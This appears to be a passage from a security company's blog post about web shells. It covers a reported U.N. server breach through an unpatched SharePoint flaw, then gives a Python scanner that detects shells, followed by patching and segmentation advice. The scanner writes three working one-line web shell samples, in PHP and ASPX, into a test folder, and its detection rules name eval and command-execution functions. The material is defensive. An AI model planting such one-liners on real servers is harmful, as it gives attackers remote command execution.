An internal confidential document from the United Nations (U.N.) dated September 20, 2019 and leaked to The New Humanitarian showed that dozens of servers at the U.N. offices in Geneva and Vienna were illegally accessed starting in July 2019. The document, seen by the Associated Press, showed that the attackers got into the organization’s servers by exploiting CVE-2019-0604 in Microsoft SharePoint, a vulnerability Microsoft had patched in February and March 2019 but which the U.N. had not applied to its systems.
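Because the shell itself can be a one-line eval of a request parameter, hunting for it is largely a matter of scanning the web root’s server-side scripts for user input flowing straight into an evaluator or command runner. The Python below is an added example written for this guide, not Microsoft’s or Talos’s tooling. It scans a constructed temporary web root containing a benign page and three tiny shells in the publicly documented China Chopper style (a PHP eval of $_POST, an ASPX eval of Request.Item, a shell_exec wrapper); the extension list and the upload-directory hints are assumptions made for the example.

```python
import hashlib
import os
import re
import tempfile

# Content signatures for the smallest, most common web shell shapes: user-controlled
# request data fed straight into an evaluator or a command runner.
RULES = [
    ("php_eval_request", re.compile(rb"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("php_exec_request", re.compile(
        rb"\b(system|shell_exec|passthru|exec|popen)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    ("aspx_eval_request", re.compile(rb"\beval\s*\(\s*Request\.(Item|Form|QueryString)\b", re.I)),
    ("jsp_exec_request", re.compile(rb"Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter", re.I)),
]
SERVER_SIDE_EXT = {".php", ".phtml", ".php5", ".asp", ".aspx", ".ashx", ".asmx", ".jsp", ".jspx"}
UPLOAD_DIR_HINTS = ("upload", "uploads", "tmp", "temp", "cache", "images")


def scan_webroot(root):
    """Walk a web root and report every server-side script whose content matches a rule."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() not in SERVER_SIDE_EXT:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                data = fh.read()
            rules = [rule for rule, rx in RULES if rx.search(data)]
            if not rules:
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            parents = rel.lower().split("/")[:-1]
            findings.append({
                "path": rel,
                "rules": rules,
                "size": len(data),                      # China Chopper-class shells are a few KB at most
                "sha256": hashlib.sha256(data).hexdigest(),
                "mtime": os.path.getmtime(path),        # compare against the deployment's timestamps
                # An executable script inside a directory that should hold only uploads/static content.
                "in_upload_dir": any(p in UPLOAD_DIR_HINTS for p in parents),
            })
    return sorted(findings, key=lambda f: f["path"])


def build_constructed_webroot():
    """Create a throwaway directory tree of constructed sample files (not real artefacts)."""
    root = tempfile.mkdtemp(prefix="webroot-")
    samples = {
        "index.php": b"<?php echo 'hello'; ?>",
        # One-liner in the documented China Chopper style: the whole shell is an eval of a
        # POST parameter; all the logic lives in the attacker's client application.
        "uploads/img.php": b"<?php @eval($_POST['cmd']); ?>",
        "static/lib.aspx": b'<%@ Page Language="Jscript"%><%eval(Request.Item["cmd"],"unsafe");%>',
        "admin/tools.php": b"<?php $o = shell_exec($_REQUEST['c']); echo $o; ?>",
        "js/app.js": b"eval(Request.Item['x'])",   # client-side file, not a server-side script
    }
    for rel, content in samples.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for f in scan_webroot(build_constructed_webroot()):
        flag = " (in upload dir)" if f["in_upload_dir"] else ""
        print(f"{f['path']}: {', '.join(f['rules'])}, {f['size']} bytes{flag}")
```

Content rules catch the simplest shells. A modified payload, the point of the Canadian Centre for Cyber Security’s warning above, can encode or split the eval to slip past them, so pair the scan with what the DART case shows: compare the web root against a known-good deployment, and treat any server-side script that is new, tiny, and sitting in an upload or static directory as suspect regardless of its content.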
Preventive and Mitigating Measures Against Web Shell Attacks
It is worth noting that web shells are only deployed on internet-facing servers after attackers find an initial loophole in them. As the examples above show, initial entry points included unpatched vBulletin (CVE-2019-16759) and unpatched SharePoint (CVE-2019-0604). It is important, therefore, to patch all your organization’s software in a timely manner, as attackers are quick to exploit unpatched software.
In the case of CVE-2019-0604 vulnerability, Microsoft’s March 12, 2019 update should be applied. In the case of CVE-2019-16759, vBulletin’s version 5.5.2/3/4 Patch Level 1 update should be applied. To mitigate vBulletin’s exposure, disable PHP, Static HTML, and Ad Module rendering setting in the administration panel.
It is also important to practise network segmentation, dividing your organization’s network into sub-networks. For instance, servers that house your organization’s critical information and are strictly meant for on-premises use should sit in their own sub-network, unreachable from the internet and from the segment that hosts your web servers. That way, if attackers compromise an internet-facing server, they cannot move on to the critical sub-network without crossing a controlled boundary.
You don’t have to face cybercriminals alone. Our experts will help you assess the current state of your cybersecurity posture, and develop a plan to proactively mitigate cyber threats.
Contact us today and protect your most valuable digital assets and your brand’s reputation.
Steve E. Driz, I.S.P., ITCP